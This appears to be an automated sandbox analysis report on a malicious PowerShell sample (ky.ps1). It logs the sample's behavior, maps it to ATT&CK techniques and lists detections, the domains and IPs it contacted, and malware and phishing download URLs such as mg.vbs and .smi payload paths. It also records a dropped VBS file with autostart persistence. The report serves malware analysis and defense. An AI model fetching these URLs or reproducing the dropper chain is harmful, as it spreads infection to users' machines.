          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0314~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-Package0513~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.Windows.StartLayout.Commands\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.Windows.StartLayout.Commands.dll VolumeInformationJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0314~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.WindowsAuthenticationProtocols.Commands\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.WindowsAuthenticationProtocols.Commands.dll VolumeInformationJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-WOW64-Package0012~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-UEV-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\UEV\Microsoft.Uev.Commands.dll VolumeInformationJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-Package05113~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\Whea\Microsoft.Windows.Whea.WheaMemoryPolicy.dll VolumeInformationJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-WOW64-Package00~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\WindowsErrorReporting\Microsoft.WindowsErrorReporting.PowerShell.dll VolumeInformationJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-Package05113~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\WindowsSearch\Microsoft.WindowsSearch.Commands.dll VolumeInformationJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.WindowsSearch.Commands\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.WindowsSearch.Commands.dll VolumeInformationJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Program Files (x86)\AutoIt3\AutoItX\AutoItX3.PowerShell.dll VolumeInformationJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
          Source: C:\Windows\System32\wscript.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior

          Mitre Att&ck Matrix

          ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
          Gather Victim Identity Information111
          Scripting          		Valid Accounts12
          Command and Scripting Interpreter          		111
          Scripting          		11
          Process Injection          		1
          Masquerading          		OS Credential Dumping1
          Security Software Discovery          		Remote Services1
          Archive Collected Data          		11
          Encrypted Channel          		Exfiltration Over Other Network MediumAbuse Accessibility Features
          CredentialsDomainsDefault Accounts1
          Exploitation for Client Execution          		1
          Registry Run Keys / Startup Folder          		1
          Registry Run Keys / Startup Folder          		21
          Virtualization/Sandbox Evasion          		LSASS Memory1
          Process Discovery          		Remote Desktop ProtocolData from Removable Media3
          Ingress Tool Transfer          		Exfiltration Over BluetoothNetwork Denial of Service
          Email AddressesDNS ServerDomain Accounts3
          PowerShell          		1
          DLL Side-Loading          		1
          DLL Side-Loading          		11
          Process Injection          		Security Account Manager21
          Virtualization/Sandbox Evasion          		SMB/Windows Admin SharesData from Network Shared Drive3
          Non-Application Layer Protocol          		Automated ExfiltrationData Encrypted for Impact
          Employee NamesVirtual Private ServerLocal AccountsCronLogin HookLogin Hook1
          Deobfuscate/Decode Files or Information          		NTDS1
          Application Window Discovery          		Distributed Component Object ModelInput Capture14
          Application Layer Protocol          		Traffic DuplicationData Destruction
          Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon ScriptNetwork Logon Script1
          Obfuscated Files or Information          		LSA Secrets1
          File and Directory Discovery          		SSHKeyloggingFallback ChannelsScheduled TransferData Encrypted for Impact
          Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC Scripts1
          DLL Side-Loading          		Cached Domain Credentials12
          System Information Discovery          		VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop

          Behavior Graph

          Hide Legend

          Legend:

          • Process
          • Signature
          • Created File
          • DNS/IP Info
          • Is Dropped
          • Is Windows Process
          • Number of created Registry Values
          • Number of created Files
          • Visual Basic
          • Delphi
          • Java
          • .Net C# or VB.NET
          • C, C++ or other language
          • Is malicious
          • Internet
          behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 1569004 Sample: ky.ps1 Startdate: 05/12/2024 Architecture: WINDOWS Score: 100 30 www.fornid.com 2->30 32 fornid.com 2->32 34 5 other IPs or domains 2->34 44 Antivirus detection for URL or domain 2->44 46 Antivirus / Scanner detection for submitted sample 2->46 48 Multi AV Scanner detection for submitted file 2->48 50 7 other signatures 2->50 9 powershell.exe 16 23 2->9         started        signatures3 process4 dnsIp5 40 fornid.com 93.95.216.175, 443, 49709 SERVERPLAN-ASIT Italy 9->40 42 www.pineappletech.ae 91.193.42.13, 443, 49715 ITFPL Belgium 9->42 28 C:\Users\Public\f3j.vbs, ASCII 9->28 dropped 52 Powershell creates an autostart link 9->52 14 wscript.exe 1 9->14         started        17 powershell.exe 23 9->17         started        19 conhost.exe 9->19         started        file6 signatures7 process8 signatures9 54 Suspicious powershell command line found 14->54 56 Wscript starts Powershell (via cmd or directly) 14->56 58 Obfuscated command line found 14->58 62 2 other signatures 14->62 21 powershell.exe 37 14->21         started        60 Loading BitLocker PowerShell Module 17->60 process10 dnsIp11 36 erp-royal-crown.info 148.251.114.233, 443, 49763, 49791 HETZNER-ASDE Germany 21->36 38 almrwad.com 184.171.244.231, 443, 49728, 49747 DIMENOCUS United States 21->38 24 conhost.exe 21->24         started        26 cmd.exe 1 21->26         started        process12

          Screenshots

          Thumbnails

          This section contains all screenshots as thumbnails, including those not shown in the slideshow.


          windows-stand

          Antivirus, Machine Learning and Genetic Malware Detection

          Initial Sample

          SourceDetectionScannerLabelLink
          ky.ps134%ReversingLabsScript-PowerShell.Trojan.PShell
          ky.ps1100%AviraTR/PShell.Dldr.VPA

          Dropped Files

          No Antivirus matches

          Unpacked PE Files

          No Antivirus matches

          Domains

          No Antivirus matches

          URLs

          SourceDetectionScannerLabelLink
          https://www.erp-royal-crown.info/wh/Subordineren100%Avira URL Cloudphishing
          https://www.almrwad.com/wh/Su0%Avira URL Cloudsafe
          https://www.fornid.com/ordine0%Avira URL Cloudsafe
          https://www.almrwad.com/0%Avira URL Cloudsafe
          https://www.almrwad.com/wh/Subordiner0%Avira URL Cloudsafe
          https://www.almrwad.com/w0%Avira URL Cloudsafe
          https://www.almrwad.com/wh/Subordine0%Avira URL Cloudsafe
          https://www.fornid.com/wh/List0%Avira URL Cloudsafe
          https://www.erp-royal-crown.info/wh/Subordinerend100%Avira URL Cloudphishing
          https://www.erp-royal-crown.info/wh/Subordinerende100%Avira URL Cloudphishing
          https://www.almrwad.c0%Avira URL Cloudsafe
          https://www.erp-royal-crown.info100%Avira URL Cloudphishing
          http://www.erp-royal-crown.info100%Avira URL Cloudphishing
          https://www.fornid.com/90-maschere-per-saldatura0%Avira URL Cloudsafe
          https://www.erp-royal-crown.info/wh/Subordine100%Avira URL Cloudphishing
          https://www.pineappletech.ae/na/mg.vbs100%Avira URL Cloudmalware
          http://www.pineappletech.ae0%Avira URL Cloudsafe
          https://www.fornid.com/133-occhiali-protettivi0%Avira URL Cloudsafe
          https://Automation.resources0%Avira URL Cloudsafe
          https://www.erp-royal-crown.i0%Avira URL Cloudsafe
          https://www.fornid.com/themes/PRS070158/css/megnor/custom.css0%Avira URL Cloudsafe
          https://www.almrwad.com/wh/Subordinerendes70%Avira URL Cloudsafe
          https://www.erp-royal-crown.info/wh/100%Avira URL Cloudphishing
          https://www.almrwad.com/wh/Subordin0%Avira URL Cloudsafe
          https://www.fornid.com/contattaci0%Avira URL Cloudsafe
          https://www.almrwad.com/wh/0%Avira URL Cloudsafe
          https://www.almrwad.com/wh/Subord0%Avira URL Cloudsafe
          https://www.almrwad.com/wh/Subordinerendes0%Avira URL Cloudsafe
          https://go.micro0%Avira URL Cloudsafe
          https://www.pinfk6applfk6tfk6ch.afk6/na/mg.vbs0%Avira URL Cloudsafe
          https://www.fornid.com0%Avira URL Cloudsafe
          https://www.almrwad.com0%Avira URL Cloudsafe
          https://www.almrwad.com/wh/Subordinerende0%Avira URL Cloudsafe
          https://www.almrwad.com/wh/Subordinerendes78.s0%Avira URL Cloudsafe
          https://www.fornid.com/wh/List%20of%20required%20items%20and%20services.pdf100%Avira URL Cloudmalware
          http://www.fornid.com/0%Avira URL Cloudsafe
          https://www.almrwad.com/wh/Subordinerendes78.sm0%Avira URL Cloudsafe
          https://www.fornid.com/144-filtri-per-maschere0%Avira URL Cloudsafe
          https://www.almrwad.com/wh/Subordinerendes780%Avira URL Cloudsafe
          http://almrwad.com0%Avira URL Cloudsafe
          https://www.erp-royal-crown.info/wh/Subord100%Avira URL Cloudphishing
          https://www.fornid.com/62-mascherine-protettive-ffp1-ffp2-ffp30%Avira URL Cloudsafe
          https://www.erp-royal-crown.info/w100%Avira URL Cloudphishing
          https://www.erp-royal-crown.info/wh/Subordinerendes78.smi100%Avira URL Cloudmalware
          https://www.erp-royal-crown.0%Avira URL Cloudsafe
          https://www.erp-royal-crown.info/wh/Subordinere100%Avira URL Cloudphishing
          https://www.almrwad.com/wh/Subordinerendes78.smi100%Avira URL Cloudmalware
          https://www.fornid.com/sitemap0%Avira URL Cloudsafe
          https://www.erp-royal-crown.info/wh100%Avira URL Cloudphishing
          http://fornid.com0%Avira URL Cloudsafe
          https://www.fornid.com/145-maschere-antigas0%Avira URL Cloudsafe
          https://www.fornid.com/314-scarpe-antinfortunistiche-e-stivale-da-lavoro0%Avira URL Cloudsafe
          https://www.erp-royal-crown.info/wh/Subor100%Avira URL Cloudphishing
          https://www.erp-royal-crown.info/wh/Subordi100%Avira URL Cloudphishing
          https://www.almrwad.com/wh/Subordinerend0%Avira URL Cloudsafe
          https://www.fornid.com/il-mio-account0%Avira URL Cloudsafe
          https://www.almrwad.com/wh/Subordinere0%Avira URL Cloudsafe
          https://www.erp-royal-crown.info/wh/Subo100%Avira URL Cloudphishing
          http://www.almrwad.com0%Avira URL Cloudsafe
          https://www.almrwad.co0%Avira URL Cloudsafe
          https://www.erp-royal-crown.in0%Avira URL Cloudsafe
          https://www.almrwad.com/wh/Subordi0%Avira URL Cloudsafe
          https://www.almrwad.com/wh/Subordinerendes78.0%Avira URL Cloudsafe
          https://www.erp-royal-crown.info/wh/Subordinerendes100%Avira URL Cloudphishing
          http://erp-royal-crown.info100%Avira URL Cloudphishing
          https://www.erp-royal-crown.info/wh/Subordinerendes78.s100%Avira URL Cloudphishing
          https://www.fornid.com/img/logo.jpg0%Avira URL Cloudsafe
          https://www.almrwad.com/wh0%Avira URL Cloudsafe
          https://www.erp-royal-crown.info/wh/Subordin100%Avira URL Cloudphishing
          https://www.almrwad.com/wh/Sub0%Avira URL Cloudsafe
          http://blog.fornid.com/0%Avira URL Cloudsafe
          https://www.almrwad.com/wh/Subo0%Avira URL Cloudsafe
          https://www.erp-royal-crown.info/wh/Subordinerendes78100%Avira URL Cloudphishing
          http://www.fornid.com/content/13-international-shipments0%Avira URL Cloudsafe
          https://www.almrwad.com/wh/Subor0%Avira URL Cloudsafe
          https://www.almrwad.0%Avira URL Cloudsafe
          https://www.erp-royal-crown.info/wh/Subordinerendes7100%Avira URL Cloudphishing
          http://www.fornid.com0%Avira URL Cloudsafe
          https://www.fornid.com/cerca0%Avira URL Cloudsafe
          http://www.microsoft.co;Q0%Avira URL Cloudsafe
          http://crl.m0%Avira URL Cloudsafe
          https://www.almrwad.com/wh/Subordineren0%Avira URL Cloudsafe
          https://www.erp-royal-crown.info/100%Avira URL Cloudphishing

          Domains and IPs

          Contacted Domains

          NameIPActiveMaliciousAntivirus DetectionReputation
          erp-royal-crown.info
          		148.251.114.233
          		truefalse
            		unknown
            almrwad.com
            		184.171.244.231
            		truefalse
              		unknown
              fornid.com
              		93.95.216.175
              		truetrue
                		unknown
                www.pineappletech.ae
                		91.193.42.13
                		truefalse
                  		high
                  www.fornid.com
                  		unknown
                  		unknowntrue
                    		unknown
                    www.almrwad.com
                    		unknown
                    		unknownfalse
                      		unknown
                      www.erp-royal-crown.info
                      		unknown
                      		unknownfalse
                        		unknown

                        Contacted URLs

                        NameMaliciousAntivirus DetectionReputation
                        https://www.pineappletech.ae/na/mg.vbsfalse
                        • Avira URL Cloud: malware
                        		unknown
                        https://www.fornid.com/wh/List%20of%20required%20items%20and%20services.pdffalse
                        • Avira URL Cloud: malware
                        		unknown
                        https://www.erp-royal-crown.info/wh/Subordinerendes78.smitrue
                        • Avira URL Cloud: malware
                        		unknown
                        https://www.almrwad.com/wh/Subordinerendes78.smifalse
                        • Avira URL Cloud: malware
                        		unknown

                        URLs from Memory and Binaries

                        NameSourceMaliciousAntivirus DetectionReputation
                        https://www.almrwad.com/wpowershell.exe, 00000006.00000002.3374685515.0000028A57268000.00000004.00000800.00020000.00000000.sdmpfalse
                        • Avira URL Cloud: safe
                        		unknown
                        https://www.fornid.com/ordinepowershell.exe, 00000000.00000002.2295236688.00000256E3773000.00000004.00000800.00020000.00000000.sdmpfalse
                        • Avira URL Cloud: safe
                        		unknown
                        https://www.almrwad.com/wh/Subordinepowershell.exe, 00000006.00000002.3374685515.0000028A57268000.00000004.00000800.00020000.00000000.sdmpfalse
                        • Avira URL Cloud: safe
                        		unknown
                        https://www.almrwad.com/wh/Subordinerpowershell.exe, 00000006.00000002.3374685515.0000028A57268000.00000004.00000800.00020000.00000000.sdmpfalse
                        • Avira URL Cloud: safe
                        		unknown
                        http://www.micom/pkiops/Docs/ry.htm0powershell.exe, 00000003.00000002.2154217645.000001C4819FA000.00000004.00000020.00020000.00000000.sdmpfalse
                          		high
                          https://www.fornid.com/wh/Listpowershell.exe, 00000000.00000002.2295236688.00000256E3284000.00000004.00000800.00020000.00000000.sdmpfalse
                          • Avira URL Cloud: safe
                          		unknown
                          https://www.almrwad.com/wh/Supowershell.exe, 00000006.00000002.3374685515.0000028A57268000.00000004.00000800.00020000.00000000.sdmpfalse
                          • Avira URL Cloud: safe
                          		unknown
                          https://www.erp-royal-crown.info/wh/Subordinerenpowershell.exe, 00000006.00000002.3374685515.0000028A57268000.00000004.00000800.00020000.00000000.sdmptrue
                          • Avira URL Cloud: phishing
                          		unknown
                          https://www.erp-royal-crown.info/wh/Subordinerendepowershell.exe, 00000006.00000002.3374685515.0000028A57268000.00000004.00000800.00020000.00000000.sdmptrue
                          • Avira URL Cloud: phishing
                          		unknown
                          https://www.almrwad.com/powershell.exe, 00000006.00000002.3374685515.0000028A57268000.00000004.00000800.00020000.00000000.sdmpfalse
                          • Avira URL Cloud: safe
                          		unknown
                          https://www.erp-royal-crown.info/wh/Subordinerendpowershell.exe, 00000006.00000002.3374685515.0000028A57268000.00000004.00000800.00020000.00000000.sdmptrue
                          • Avira URL Cloud: phishing
                          		unknown
                          http://www.erp-royal-crown.infopowershell.exe, 00000006.00000002.3374685515.0000028A56640000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000006.00000002.3374685515.0000028A56BF1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000006.00000002.3374685515.0000028A56D8A000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000006.00000002.3374685515.0000028A57268000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000006.00000002.3374685515.0000028A56304000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000006.00000002.3374685515.0000028A56025000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000006.00000002.3374685515.0000028A56785000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000006.00000002.3374685515.0000028A56E61000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000006.00000002.3374685515.0000028A56A85000.00000004.00000800.00020000.00000000.sdmptrue
                          • Avira URL Cloud: phishing
                          		unknown
                          https://www.almrwad.cpowershell.exe, 00000006.00000002.3374685515.0000028A57268000.00000004.00000800.00020000.00000000.sdmpfalse
                          • Avira URL Cloud: safe
                          		unknown
                          https://www.erp-royal-crown.infopowershell.exe, 00000006.00000002.3374685515.0000028A57268000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000006.00000002.3374685515.0000028A56025000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000006.00000002.3374685515.0000028A56785000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000006.00000002.3374685515.0000028A56E61000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000006.00000002.3374685515.0000028A56A85000.00000004.00000800.00020000.00000000.sdmptrue
                          • Avira URL Cloud: phishing
                          		unknown
                          https://www.fornid.com/90-maschere-per-saldaturapowershell.exe, 00000000.00000002.2295236688.00000256E3773000.00000004.00000800.00020000.00000000.sdmpfalse
                          • Avira URL Cloud: safe
                          		unknown
                          https://nuget.org/nuget.exepowershell.exe, 00000000.00000002.2361683425.00000256F1E02000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.2361683425.00000256F1CC0000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.2174560183.000001C493751000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000006.00000002.3467332156.0000028A65C63000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000006.00000002.3467332156.0000028A65B21000.00000004.00000800.00020000.00000000.sdmpfalse
                            		high
                            https://Automation.resourcespowershell.exe, 00000003.00000002.2178901425.000001C49B914000.00000004.00000020.00020000.00000000.sdmpfalse
                            • Avira URL Cloud: safe
                            		unknown
                            https://www.erp-royal-crown.info/wh/Subordinepowershell.exe, 00000006.00000002.3374685515.0000028A57268000.00000004.00000800.00020000.00000000.sdmptrue
                            • Avira URL Cloud: phishing
                            		unknown
                            http://www.pineappletech.aepowershell.exe, 00000000.00000002.2295236688.00000256E3BC5000.00000004.00000800.00020000.00000000.sdmpfalse
                            • Avira URL Cloud: safe
                            		unknown
                            https://www.fornid.com/133-occhiali-protettivipowershell.exe, 00000000.00000002.2295236688.00000256E3773000.00000004.00000800.00020000.00000000.sdmpfalse
                            • Avira URL Cloud: safe
                            		unknown
                            https://www.erp-royal-crown.ipowershell.exe, 00000006.00000002.3374685515.0000028A57268000.00000004.00000800.00020000.00000000.sdmpfalse
                            • Avira URL Cloud: safe
                            		unknown
                            https://www.fornid.com/themes/PRS070158/css/megnor/custom.csspowershell.exe, 00000000.00000002.2295236688.00000256E3773000.00000004.00000800.00020000.00000000.sdmpfalse
                            • Avira URL Cloud: safe
                            		unknown
                            http://schemas.xmlsoap.org/ws/2005/05/identity/claims/namepowershell.exe, 00000000.00000002.2295236688.00000256E1C51000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.2154679290.000001C4836E1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000006.00000002.3374685515.0000028A55AB1000.00000004.00000800.00020000.00000000.sdmpfalse
                              		high
                              https://www.almrwad.com/wh/Subordinpowershell.exe, 00000006.00000002.3374685515.0000028A57268000.00000004.00000800.00020000.00000000.sdmpfalse
                              • Avira URL Cloud: safe
                              		unknown
                              https://www.erp-royal-crown.info/wh/powershell.exe, 00000006.00000002.3374685515.0000028A57268000.00000004.00000800.00020000.00000000.sdmptrue
                              • Avira URL Cloud: phishing
                              		unknown
                              https://www.almrwad.com/wh/Subordinerendes7powershell.exe, 00000006.00000002.3374685515.0000028A57268000.00000004.00000800.00020000.00000000.sdmpfalse
                              • Avira URL Cloud: safe
                              		unknown
                              https://www.almrwad.com/wh/Subordpowershell.exe, 00000006.00000002.3374685515.0000028A57268000.00000004.00000800.00020000.00000000.sdmpfalse
                              • Avira URL Cloud: safe
                              		unknown
                              https://aka.ms/winsvr-2022-pshelppowershell.exe, 00000003.00000002.2154679290.000001C48390A000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.2154679290.000001C4849F0000.00000004.00000800.00020000.00000000.sdmpfalse
                                		high
                                https://www.fornid.com/contattacipowershell.exe, 00000000.00000002.2295236688.00000256E3773000.00000004.00000800.00020000.00000000.sdmpfalse
                                • Avira URL Cloud: safe
                                		unknown
                                http://pesterbdd.com/images/Pester.pngpowershell.exe, 00000006.00000002.3374685515.0000028A55CDE000.00000004.00000800.00020000.00000000.sdmpfalse
                                  		high
                                  https://www.almrwad.com/wh/powershell.exe, 00000006.00000002.3374685515.0000028A57268000.00000004.00000800.00020000.00000000.sdmpfalse
                                  • Avira URL Cloud: safe
                                  		unknown
                                  https://www.almrwad.com/wh/Subordinerendespowershell.exe, 00000006.00000002.3374685515.0000028A57268000.00000004.00000800.00020000.00000000.sdmpfalse
                                  • Avira URL Cloud: safe
                                  		unknown
                                  http://schemas.xmlsoap.org/soap/encoding/powershell.exe, 00000003.00000002.2154679290.000001C48390A000.00000004.00000800.00020000.00000000.sdmpfalse
                                    		high
                                    http://www.apache.org/licenses/LICENSE-2.0.htmlpowershell.exe, 00000006.00000002.3374685515.0000028A55CDE000.00000004.00000800.00020000.00000000.sdmpfalse
                                      		high
                                      https://go.micropowershell.exe, 00000000.00000002.2295236688.00000256E2884000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.2154679290.000001C4849F0000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.2154679290.000001C483FE3000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.2154679290.000001C484D72000.00000004.00000800.00020000.00000000.sdmptrue
                                      • Avira URL Cloud: safe
                                      		unknown
                                      https://contoso.com/Iconpowershell.exe, 00000006.00000002.3467332156.0000028A65B21000.00000004.00000800.00020000.00000000.sdmpfalse
                                        		high
                                        https://www.pinfk6applfk6tfk6ch.afk6/na/mg.vbspowershell.exe, 00000000.00000002.2295236688.00000256E3773000.00000004.00000800.00020000.00000000.sdmpfalse
